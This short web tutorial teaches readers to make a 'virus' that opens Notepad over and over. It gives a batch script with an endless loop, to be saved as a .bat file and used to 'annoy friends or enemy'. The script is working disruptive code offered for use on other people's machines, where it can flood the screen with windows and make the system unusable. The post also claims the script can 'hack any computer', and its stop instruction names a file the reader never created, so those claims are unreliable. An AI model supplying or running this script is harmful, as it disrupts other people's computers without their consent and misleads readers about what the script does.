Trick to make a Virus which open notepad continuously
Learn how to make a virus that can hack any computer to open the notepad continuously.
There is a trick to open notepad continuously. This trick can be used to annoy friends or enemy.
To use this trick just follow the given below steps:
- Open Notepad.
- Copy and paste the following code in notepad:
@echo off
:tricks
Start %systemroot%\system32\notepad.exe
Goto tricks
- Save it as notepadopen.bat.
- Now it is done.
- If you want to stop this trick, close notepad.bat.